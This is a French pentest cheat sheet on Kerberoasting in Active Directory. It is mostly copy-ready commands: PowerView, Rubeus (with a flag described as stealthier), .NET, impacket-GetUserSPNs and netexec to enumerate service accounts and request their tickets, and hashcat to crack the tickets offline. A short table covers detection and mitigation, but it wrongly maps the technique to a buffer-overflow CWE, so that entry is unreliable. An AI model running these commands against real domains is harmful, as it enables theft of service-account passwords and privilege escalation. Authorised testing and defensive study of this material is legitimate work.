Aller au contenu

Kerberoasting

Le kerberoasting consiste à cibler les utilisateurs ayant un SPN. De ce fait, il est possible de récupérer un TGS à leur nom et ainsi de tenter de le cracker pour récupérer le password du compte.

0 GIZONcxOmJC9DyH5

Powershell

Lister les comptes avec un SPN

1
2
3
Get-DomainUser -SPN #powerview
---
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName #powershell

Avec Rubeus

1
Rubeus.exe kerberoast /stats

Request un TGS

1
Rubeus.exe kerberoast /user:utilisateur /simple

Request un TGS sans downgrade du chiffrement. Cela permet de ne demander que les SPN avec un chiffrement type RC4_HMAC, ce qui est potentiellement plus stealthy

1
2
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:utilisateur /simple /rc4opsec

En .net

Request d'un tgs

1
2
Add-Type -AssemblyNAme System.IdentityModel 
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "USSvc/serviceaccount"

Depuis linux

Lister les comptes avec un SPN

1
2
3
4
netexec ldap -u "user" -p "password" --kerberoasting output.txt
---
impacket-GetUserSPNs -dc-ip $ip -u "" -p "" $domain/$user
impacket-GetUserSPNs -dc-ip $ip $domain/$user -request -outputfile output.txt

Cracker le tgs

1
hashcat -m 13100 '$tgs' /usr/share/wordlist/rockyou.txt

crack-ticket

Catégorie Information
TTP T1208 (Kerberoasting)
CWE CWE-120 (Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'))
Description de l'attaque Kerberoasting exploite la fonctionnalité des tickets de service Kerberos dans les environnements Windows. Les attaquants extraient les tickets de service Kerberos et les craquent hors ligne pour obtenir des mots de passe d'utilisateurs de service faibles.
Impacts potentiels - Accès non autorisé aux ressources réseau
- Compromission de comptes de service
- Élévation de privilèges
Comment la détecter - Surveillance des demandes anormales de tickets de service Kerberos
- Analyse des journaux pour les tentatives de connexion échouées fréquentes
- Utilisation d'outils de détection d'intrusion
Remédiations/mitigations - Utiliser des mots de passe forts pour les comptes de service
- Appliquer la politique de sécurité Least Privilege
- Mettre en œuvre des audits réguliers des comptes et des mots de passe
- Utiliser Advanced Threat Protection pour surveiller les activités suspectes
Lien de référence MITRE ATT&CK - T1208: Kerberoasting